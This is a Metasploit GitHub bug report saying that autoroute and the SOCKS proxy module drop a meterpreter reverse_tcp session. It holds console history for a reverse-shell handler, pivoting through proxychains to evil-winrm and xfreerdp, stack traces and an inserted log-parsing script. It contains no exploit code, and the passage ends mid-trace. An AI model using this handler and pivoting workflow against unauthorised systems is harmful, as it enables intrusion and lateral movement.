Autoroute kills meterpreter session #18478

Closed
mikekhusid opened this issue Oct 22, 2023 · 4 comments
Labels: bug, Stale

Comments

@mikekhusid

Steps to reproduce

How'd you do it?

  1. Open a meterpreter session using windows/x64/meterpreter/reverse_tcp
  2. use autoroute and set to meterpreter session.
  3. use proxy_server, with socks4a (socks5 has same issue). exploit as job.
  4. proxychains.conf is set to proxy_server options (127.0.0.1 1080)
  5. use proxychains evil-winrm or proxychains xfreerdp
  6. meterpreter session outright dies or hangs

This did not use to happen! In the same lab environment this worked fine several months ago.

Expected behavior

Meterpreter session does not die.

Current behavior

Meterpreter session dies

Metasploit version

Framework: 6.3.38-dev
Console : 6.3.38-dev

I also rolled back to 6.3.27 as a test and this still occurred.

Debug output:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=auxiliary/server/socks_proxy

[server/socks_proxy]
SRVHOST=127.0.0.1
VERSION=4a
WORKSPACE=
VERBOSE=false
SRVPORT=1080
ListenerBindAddress=
ListenerBindPort=
ListenerComm=
USERNAME=
PASSWORD=

Database Configuration

The database contains the following information:

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

1140   set loglevel3
1141   set loglevel 3
1142   debug
1143   version
1144   use exploit/multi/handler
1145   set payload windows/x64/meterpreter/reverse_tcp
1146   set lhost tun0
1147   set lport 443
1148   exploit
1149   use autoroute
1150   set session 1
1151   exploit
1152   use socks_proxy
1153   set srvhost 127.0.0.1
1154   set version 4a
1155   exploit -j
1156   netstat -ntlp
1157   sessions
1158   session 1
1159   sessions 1
1160   debug

Framework Errors

The following framework errors occurred before the issue occurred:

[10/21/2023 20:35:35] [e(0)] core: Interrupt
[10/21/2023 20:36:07] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 20:37:58] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 20:42:10] [e(0)] core: Thread Exception: SOCKS4AProxyClient  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:235:in `start'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:390:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 20:43:38] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:136:in `monitor_rsock'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/stream_abstraction.rb:30:in `initialize_abstraction'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/socket_abstraction.rb:56:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:73:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `new'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `create'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:36:in `open'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:124:in `create_tcp_client_channel'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:93:in `create'
    /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 20:52:20] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 20:52:20] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
[10/21/2023 21:33:10] [e(0)] core: Failed to connect to the database: No database YAML file
[10/21/2023 21:40:54] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:41:07] [e(0)] core: Module socks_proxy not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[10/21/2023 21:34:48] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: none to reverse
[10/21/2023 21:35:03] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[10/21/2023 21:35:03] [d(1)] core: Module windows/x64/meterpreter/reverse_tcp is compatible with multi/handler
[10/21/2023 21:40:54] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:40:54] [i(2)] core: Reloading post module multi/manage/autoroute. Ambiguous module warnings are safe to ignore
[10/21/2023 21:41:07] [e(0)] core: Module socks_proxy not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:41:07] [i(2)] core: Reloading auxiliary module server/socks_proxy. Ambiguous module warnings are safe to ignore
[10/21/2023 21:41:22] [w(0)] core: Socks4a.start - The address is already in use or unavailable: (127.0.0.1:1080).
[10/21/2023 21:43:14] [w(0)] core: Client.start - Failed to handle the clients request.
[10/21/2023 21:43:29] [w(0)] core: Client.start - Failed to handle the clients request.
[10/21/2023 21:43:44] [w(0)] core: Client.start - Failed to handle the clients request.
[10/21/2023 21:46:10] [d(0)] core: monitor_rsock: EOF in rsock
[10/21/2023 21:46:10] [d(0)] core: monitor_rsock: EOF in rsock

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.3.38-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.8 7 Feb 2023
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
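
The framework error logs on this page repeat the same multi-line `Thread Exception` record many times. As an added example (not code from Metasploit or from the reporter), this Ruby script collapses such an excerpt into one row per thread name and error; the method names, constants and the abridged sample log are assumptions built from the record format shown on this page.

```ruby
# Added example: triage helper for Metasploit framework.log excerpts.
# Not part of Metasploit; all method and constant names here are hypothetical.

# "[MM/DD/YYYY HH:MM:SS] [e(0)] core: message" opens every log record.
ENTRY_RE  = %r{\A\[(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\] \[(\w)\((\d)\)\] (\w+): (.*)\z}
# Thread-exception records name the thread that raised.
THREAD_RE = /\AThread Exception: (\S+)\s+critical=(\w+)/
# The last "source" frame carries " - ErrorClass error message".
ERROR_RE  = /\A(.*?) - ((?:[A-Z]\w*::)*[A-Z]\w*) (.*)\z/

# Sample input, constructed by abridging records of the kind shown on this page.
# It deliberately starts mid-trace, as a pasted excerpt often does.
SAMPLE_LOG = <<~'LOG'
      /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  [10/21/2023 21:33:10] [e(0)] core: Failed to connect to the database: No database YAML file
  [10/21/2023 21:51:10] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
      /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  Call stack:
  /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
  /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
  [10/21/2023 21:51:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
      /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  Call stack:
  /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
  [10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
      /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  Call stack:
  /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
LOG

# Split an excerpt into records. Each record keeps its header fields, the
# "source" frames (where the thread was spawned) and, when present, the
# "Call stack:" frames (where the error was raised).
def parse_entries(text)
  entries = []
  current = nil
  section = :source
  text.each_line(chomp: true) do |raw|
    line = raw.strip
    next if line.empty?

    if (m = ENTRY_RE.match(line))
      current = { time: m[1], level: m[2], message: m[5], thread: nil,
                  error_class: nil, error_message: nil, source: [], call_stack: [] }
      thread = THREAD_RE.match(m[5])
      current[:thread] = thread[1] if thread
      entries << current
      section = :source
    elsif current.nil?
      next # frame with no header before it: the excerpt started mid-trace
    elsif line == 'Call stack:'
      section = :call_stack
    else
      if section == :source && (e = ERROR_RE.match(line))
        line = e[1] # keep the frame, move the error into its own fields
        current[:error_class] = e[2]
        current[:error_message] = e[3]
      end
      current[section] << line
    end
  end
  entries
end

# Group thread exceptions by thread name and error. first/last assume the
# excerpt is in file order, which is chronological for framework.log.
def summarize_thread_exceptions(entries)
  groups = {}
  entries.each do |e|
    next unless e[:thread]

    key = [e[:thread], e[:error_class], e[:error_message]]
    g = (groups[key] ||= { thread: e[:thread], error: e[:error_class],
                           message: e[:error_message], count: 0,
                           first: e[:time], last: e[:time], raised_at: nil })
    g[:count] += 1
    g[:last] = e[:time]
    # Innermost call-stack frame, with the install prefix up to /lib/ removed.
    g[:raised_at] ||= e[:call_stack].first&.sub(%r{\A.*?/lib/}, '')
  end
  groups.values.sort_by { |g| [-g[:count], g[:thread]] }
end

if __FILE__ == $PROGRAM_NAME
  summarize_thread_exceptions(parse_entries(SAMPLE_LOG)).each do |g|
    puts "#{g[:count]}x #{g[:thread]}: #{g[:error]} (#{g[:message]}), " \
         "#{g[:first]} to #{g[:last]}, raised at #{g[:raised_at]}"
  end
end
```
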
@mikekhusid
Author

Even just exploiting autoroute kills the session sometimes:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=post/multi/manage/autoroute

[multi/manage/autoroute]
SESSION=2
WORKSPACE=
VERBOSE=false
SUBNET=
NETMASK=255.255.255.0
CMD=autoadd

Database Configuration

The database contains the following information:

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

1140   set loglevel3
1141   set loglevel 3
1142   debug
1143   version
1144   use exploit/multi/handler
1145   set payload windows/x64/meterpreter/reverse_tcp
1146   set lhost tun0
1147   set lport 443
1148   exploit
1149   use autoroute
1150   set session 1
1151   exploit
1152   use socks_proxy
1153   set srvhost 127.0.0.1
1154   set version 4a
1155   exploit -j
1156   netstat -ntlp
1157   sessions
1158   session 1
1159   sessions 1
1160   debug
1161   version
1162   use exploit/multi/handler
1163   show options
1164   exploit
1165   use autoroute
1166   set session 2
1167   exploit
1168   debug

Framework Errors

The following framework errors occurred before the issue occurred:

[10/21/2023 21:33:10] [e(0)] core: Failed to connect to the database: No database YAML file
[10/21/2023 21:40:54] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:41:07] [e(0)] core: Module socks_proxy not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 21:51:10] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:136:in `monitor_rsock'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/stream_abstraction.rb:30:in `initialize_abstraction'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/socket_abstraction.rb:56:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:73:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `new'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `create'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:36:in `open'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:124:in `create_tcp_client_channel'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:93:in `create'
    /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:51:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:51:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: StreamMonitorRemote  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:136:in `monitor_rsock'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/stream_abstraction.rb:30:in `initialize_abstraction'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channels/socket_abstraction.rb:56:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:73:in `initialize'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `new'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:124:in `create'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:36:in `open'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:124:in `create_tcp_client_channel'
    /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:93:in `create'
    /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 22:58:59] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket.rb:51:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:37:in `create_param'
    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
